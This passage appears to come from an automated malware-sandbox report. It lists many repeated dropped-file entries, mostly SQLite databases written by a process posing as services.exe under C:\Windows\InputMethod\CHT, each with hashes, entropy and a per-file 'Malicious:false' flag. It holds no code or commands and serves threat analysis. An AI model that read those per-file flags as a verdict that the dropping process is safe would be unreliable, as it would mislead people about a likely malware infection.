                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):25
                                                              Entropy (8bit):4.293660689688185
                                                              Encrypted:false
                                                              SSDEEP:3:peEvlWCqHn:pbvMXH
                                                              MD5:4B85E8C1BF9FF0855567D301904AECF7
                                                              SHA1:78BDBF80156B68D90C7BCD264CBF9761566D0CF1
                                                              SHA-256:01A74A9F0BB54E6DFCD1C73A52402B47ADD36B77E0DC716DBA642BDEADA296FD
                                                              SHA-512:2104FEEC40E0095122891DE7661335C6719760479EB1394B6588AF695F68348E97D4276CB41B8AB825CDD8A4E7FDC53C176650E4DF2327E14E08189977815879
                                                              Malicious:false
                                                              Preview:tIcNSudZeaJFNJTnsVPY7fssb
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
